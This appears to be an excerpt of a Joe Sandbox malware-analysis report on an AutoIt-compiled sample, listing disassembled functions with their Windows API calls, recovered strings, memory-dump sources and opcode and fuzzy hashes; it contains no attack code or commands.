API String ID: 157775604-1150593374
Opcode ID: 152f9e4c382971d99b16a216b283b1448da490fb44f1ed8563ab4db54fd1f355
Instruction ID: efb601422b4a295681cf55c3172fae37f1f53af4327dc020a8e6ab22dcc3f06a
Opcode Fuzzy Hash: 152f9e4c382971d99b16a216b283b1448da490fb44f1ed8563ab4db54fd1f355
Instruction Fuzzy Hash: DB41C231E106199FCB18DFA8C8859AEBBF5FF69324F10402DE445AB252EB709D91CF90

Function 0023D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0023D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0023D13A

Strings

|, xrefs: 0023D10B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 091576baa934fb64e3b087fe3ba407ff4eb0b4a0b336fc69c3a2f506f7b47f28
Instruction ID: 5a1e707052e05ca3c93e9599960d9ab109de6c5e234cf44995beed29448afcc3
Opcode Fuzzy Hash: 091576baa934fb64e3b087fe3ba407ff4eb0b4a0b336fc69c3a2f506f7b47f28
Instruction Fuzzy Hash: 41313E71D10209ABCF15EFA5DC85EEEBFB9FF28300F100019F819A6166E771AA16DB50

Function 0025356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00253621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0025365C

Strings

static, xrefs: 002535BC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e5420500f4c52146fd167703b901aa9a3bdd7def6b822236f339d95f3423d29f
Instruction ID: ebb242a8c782e94899e259261907e910ea6796ab9e81009c82ccab6b7c443427
Opcode Fuzzy Hash: e5420500f4c52146fd167703b901aa9a3bdd7def6b822236f339d95f3423d29f
Instruction Fuzzy Hash: C031A071120205AEDB10DF28DC80EBB73ADFF98761F10961DF86597280DA30EDA5CB68

Function 00254537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0025461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00254634

Strings

', xrefs: 0025458E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 457fb765279ffd60f20386b134b0411df40909c0f8bfff87aab4780d0c8675ad
Instruction ID: 81f3755f93ef49471d6c6af57c04c32d437b7ea219415e5906fdbd377ec6c585
Opcode Fuzzy Hash: 457fb765279ffd60f20386b134b0411df40909c0f8bfff87aab4780d0c8675ad
Instruction Fuzzy Hash: B6314974A0030A9FDB14DF69C980BDABBB9FF19305F50406AED04AB341E770A995CF94

Function 002531EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0025327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00253287

Strings

Combobox, xrefs: 00253249

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 4b5deb01b5aefb5506c380be7431756d772d8eda6f76996efbbd048e21583f1d
Instruction ID: 047cbef421b5a9233960302a08a79d4329e9bec4f99ff9d8b857504e44ff232c
Opcode Fuzzy Hash: 4b5deb01b5aefb5506c380be7431756d772d8eda6f76996efbbd048e21583f1d
Instruction Fuzzy Hash: 381100712206096FEF25DE54DC80EBB376AEB943A1F105128FD18E7290D631DD618B64

Function 00253710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C604C
Part of subcall function 001C600E: GetStockObject.GDI32(00000011), ref: 001C6060
Part of subcall function 001C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001C606A

GetWindowRect.USER32(00000000,?), ref: 0025377A
GetSysColor.USER32(00000012), ref: 00253794

Strings

static, xrefs: 00253757

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a44ffa6f795a9dcad4d355cbdf334f202ee2032e5d3e81ead150bdfa988c5722
Instruction ID: ef05c572d02728f75356795529d4b8ff4695af3e080c40ab5c385b315f4e92c9
Opcode Fuzzy Hash: a44ffa6f795a9dcad4d355cbdf334f202ee2032e5d3e81ead150bdfa988c5722
Instruction Fuzzy Hash: 111159B2A2020AAFDB00DFA8CC45EEA7BB8FB08345F005514FD55E2250E774E8659B50

Function 0023CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0023CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0023CDA6

Strings

<local>, xrefs: 0023CD66

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 1f04c11ddd62c6f307fbe4a27128853340c7cca6378d0c0b3351d5c770f64dd0
Instruction ID: 41176c1cc8be00e6e4404c43ac965582a8b09f4eb7c625e54e319f3749e91bb4
Opcode Fuzzy Hash: 1f04c11ddd62c6f307fbe4a27128853340c7cca6378d0c0b3351d5c770f64dd0
Instruction Fuzzy Hash: 2711C6B562563A7AD7384F668C49FE7BE6CEF167A4F204236B109A3080D7709860D7F0

Function 00253429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002534AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002534BA

Strings

edit, xrefs: 0025348F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c8a0484b495f9169f5eb823ee4497a3ccc61eb12c549cb71a8e578372c9c24c2
Instruction ID: 124e222d468c2c84ecdafd2da159e85b0c40cf993a6413e98bcae045092540f4
Opcode Fuzzy Hash: c8a0484b495f9169f5eb823ee4497a3ccc61eb12c549cb71a8e578372c9c24c2
Instruction Fuzzy Hash: DA11EF31120209AFEB118E64EC44ABB376AEB003B5F605324FD20931D0C371DCA99B58

Function 00226C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00226CB6
_wcslen.LIBCMT ref: 00226CC2

Strings

STOP, xrefs: 00226CBC, 00226CC1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 2b87a8f7d670bde0f91c8bde7f37cded7b0ecce8d51ec221000f24fcaf4a997f
Instruction ID: 7f6783f92f67850d3bdf717120c7ed11e40451f62f8dabc270102646f451d013
Opcode Fuzzy Hash: 2b87a8f7d670bde0f91c8bde7f37cded7b0ecce8d51ec221000f24fcaf4a997f
Instruction Fuzzy Hash: 8F010433A2053BABCB20AFFDEC8C9BF33A4EB717147500529E86297190EB31D920C650

Function 00221CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00221D4C

Strings

ComboBox, xrefs: 00221CEB
ListBox, xrefs: 00221D16

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 263be2d47321a9605ae62fcbe92ac957fbdc2d3f990160e6cfa641554c27e6ed
Instruction ID: b2a1ea05082fe9ce412d1afa5ecd5b115d8e9ef208c873e76a4e3a7952ccdb35
Opcode Fuzzy Hash: 263be2d47321a9605ae62fcbe92ac957fbdc2d3f990160e6cfa641554c27e6ed
Instruction Fuzzy Hash: 3101F535621228BBCB08EFE0EC15DFE7368EB76350B00051AE832572C1EB3099388760

Function 00221BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00221C46

Strings

ComboBox, xrefs: 00221BE5
ListBox, xrefs: 00221C10

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6b5cf5685db7a45262f10aea4ab68be56fdabb834f9ec998c5610c3cafdbbcdc
Instruction ID: 265bd77fbdab3f5b9e799933e4bbbf5eab78a4f655e05ed2cd7fcc553c2ee7f2
Opcode Fuzzy Hash: 6b5cf5685db7a45262f10aea4ab68be56fdabb834f9ec998c5610c3cafdbbcdc
Instruction Fuzzy Hash: E101D87965111876CB04EBD0E955EFF77A89B31340F10001AA416771C1EA249E3886B6

Function 00221C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00221CC8

Strings

ComboBox, xrefs: 00221C69
ListBox, xrefs: 00221C94

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 48fc11560ccaf07a22df00ffa81258c36fc91d9206009c48994e3a33404c4e55
Instruction ID: 9f23db46b91a512cc8ba46819931dd672313a2ae61a7f577497aa30ff2461564
Opcode Fuzzy Hash: 48fc11560ccaf07a22df00ffa81258c36fc91d9206009c48994e3a33404c4e55
Instruction Fuzzy Hash: 5601A77965112976CB14FBD0EA15EFE77A89B31340B14001AB80177281EA649F389676

Function 001DA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001DA529

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Strings

3y!, xrefs: 001DA545, 001DA54D, 001DA552
,%), xrefs: 001DA509

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%)$3y!
API String ID: 2551934079-3039355943
Opcode ID: e7987ec14f6375231c50c68866392dad43c53ec4fa38d9166931c60e47141814
Instruction ID: 583856772bc1b8ebd3f9a7838b1a844e852f20f048219ef1ca57e11da34193ff
Opcode Fuzzy Hash: e7987ec14f6375231c50c68866392dad43c53ec4fa38d9166931c60e47141814
Instruction Fuzzy Hash: 0F012632B406149BCA09F768F85FF6D33689F29720FD5002AF5121B3C2EF509D458A9B

Function 00221D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00221DD3

Strings

ComboBox, xrefs: 00221D75
ListBox, xrefs: 00221DA0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ff379b44bdafb13b7e7d261f6b90ae2dc698391ed220cd1f2de612bd7da234c4
Instruction ID: 2ba2104fb05daade72cbdc2ed23ce4ca31743401da14fb4ce2bbc75ab87b63d0
Opcode Fuzzy Hash: ff379b44bdafb13b7e7d261f6b90ae2dc698391ed220cd1f2de612bd7da234c4
Instruction Fuzzy Hash: DEF0F971A61228B6C704FBE4EC55FFE7768AB32340F040919F422672C1DB6499288664

Function 00258172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00293018,0029305C), ref: 002581BF
CloseHandle.KERNEL32 ref: 002581D1

Strings

\0), xrefs: 0025818A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0)
API String ID: 3712363035-118726745
Opcode ID: 6b4cfa32676cb14f4c0bdc0730c7626b08dd519f13916ecd3e03202d0182de82
Instruction ID: 549d8643af49fa417ef00566433ce2dc11352b09c56c4f43293c33123ca34bca
Opcode Fuzzy Hash: 6b4cfa32676cb14f4c0bdc0730c7626b08dd519f13916ecd3e03202d0182de82
Instruction Fuzzy Hash: ABF082B6650304BEE720AB62BC4EFB73A5CEB08751F004461FB0CD51A2E6B58E1087F8

Function 0024747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00247493
_wcslen.LIBCMT ref: 002474B9

Strings

3, 3, 16, 1, xrefs: 00247483

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 4eb45be2295516c81dcfc6da9568c6561d6fe8e6593fc3fb007a7afd1cbad339
Instruction ID: d84703e73ecedbc54f58db5cd62980288787570d1785a67014c68f20763feec1
Opcode Fuzzy Hash: 4eb45be2295516c81dcfc6da9568c6561d6fe8e6593fc3fb007a7afd1cbad339
Instruction Fuzzy Hash: C7E0AB06224660119234223A9CC197F4799CFDD350310082BF880D2267EB80CCB183F0

Function 00220B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00220B23

Strings

AutoIt, xrefs: 00220B17
Error allocating memory., xrefs: 00220B1C

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 3285e4b1059ca744fd76e87f4bb9f859b5bce1f526b946c5f49366bed04a8180
Instruction ID: d5ef2e10e2ff448694053f7601bf60c1e338178e5c556fcbbb6fe8d5c5081045
Opcode Fuzzy Hash: 3285e4b1059ca744fd76e87f4bb9f859b5bce1f526b946c5f49366bed04a8180
Instruction Fuzzy Hash: 7FE0D8312543183ED21037957C07F8D7B84CF19F62F20042BFB48555C39BE1656046ED

Function 001E0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001E0D71,?,?,?,001C100A), ref: 001DF7CE

IsDebuggerPresent.KERNEL32(?,?,?,001C100A), ref: 001E0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001C100A), ref: 001E0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001E0D7F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 714ed0fa45d2368712ac1fe3829b427117342946896151ff736a430fcc38d4af
Instruction ID: 02cc5b3247c10a8a252e530b5cc42ab13bf154d4b91c531237101586165c8707
Opcode Fuzzy Hash: 714ed0fa45d2368712ac1fe3829b427117342946896151ff736a430fcc38d4af
Instruction Fuzzy Hash: 88E06D702007418FD3619FB9E90978A7BE0BB18745F04492DE886C6651EBF0E4888BA1

Function 001DE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001DE3D5

Strings

0%), xrefs: 001DE3B5
8%), xrefs: 001DE3CA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%)$8%)
API String ID: 1385522511-30828310
Opcode ID: fe44fc885e9ecbeea0b40043935ce0ccc5f23b3bd87426c84a0cc15d2ab23e52
Instruction ID: 4f8c4b12ee2cf4149b92002b957b5be26626db7591ca0de37c2d18ad85e25da6
Opcode Fuzzy Hash: fe44fc885e9ecbeea0b40043935ce0ccc5f23b3bd87426c84a0cc15d2ab23e52
